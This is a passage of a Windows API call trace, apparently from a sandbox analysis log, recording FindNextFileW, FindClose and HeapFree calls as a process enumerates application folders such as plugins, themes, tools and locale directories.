nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0176.854] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0176.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.854] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0176.854] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0176.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0176.856] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24df500, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x24df500, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x24df500, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fss", cAlternateFileName="")) returned 1 [0176.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.857] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x250574b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x250574b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x250574b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="img", cAlternateFileName="")) returned 1 [0176.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.928] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x284cad6, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x284cad6, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x284cad6, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0176.928] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0176.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.929] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x252b9a4, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x252b9a4, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x252b9a4, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tools", cAlternateFileName="")) returned 1 [0177.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.021] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3da30 | out: lpFindFileData=0x3b3da30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b41a7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x27b41a7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x27b41a7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0177.021] FindClose (in: hFindFile=0x727708 | out: hFindFile=0x727708) returned 1 [0177.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.021] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3dcac | out: lpFindFileData=0x3b3dcac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b41a7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x27b41a7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x27b41a7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0177.021] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0177.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.021] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284cad6, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x284cad6, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x284cad6, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x1dae, dwReserved0=0x0, dwReserved1=0x0, cFileName="check.cur", cAlternateFileName="")) returned 1 [0177.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0177.051] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3dcac | out: lpFindFileData=0x3b3dcac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f5618, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x26f5618, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x26f5618, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dark", cAlternateFileName="")) returned 0 [0177.051] FindClose (in: hFindFile=0x6ba130 | out: hFindFile=0x6ba130) returned 1 [0177.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0177.051] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284cad6, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x284cad6, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x284cad6, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x1dae, dwReserved0=0x0, dwReserved1=0x0, cFileName="x.cur", cAlternateFileName="")) returned 1 [0177.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0177.051] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x252b9a4, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x252b9a4, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x252b9a4, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tools", cAlternateFileName="")) returned 0 [0177.052] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0177.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.052] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0177.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.155] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0177.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.156] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0177.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.157] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0177.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.159] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0177.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.159] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0177.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.160] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0177.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.161] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0177.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.162] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0177.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.162] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0177.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.163] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0177.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.164] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0177.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.164] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0177.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.164] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0177.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.165] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e1275, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32e1275, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32e1275, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0177.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.165] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e1275, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32e1275, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32e1275, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0177.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.166] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0177.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.166] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e1275, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32e1275, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32e1275, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0177.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.167] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0177.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.168] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32baff3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x32baff3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x32baff3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0177.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.169] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0177.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.169] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x332d73b, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x332d73b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x332d73b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0177.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.170] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0177.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.170] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0177.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.171] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x330748d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x330748d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x330748d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0177.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.172] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2957bb1, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x2957bb1, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x2957bb1, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0177.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.172] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x297ddff, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x297ddff, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x297ddff, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0177.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.173] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e1275, 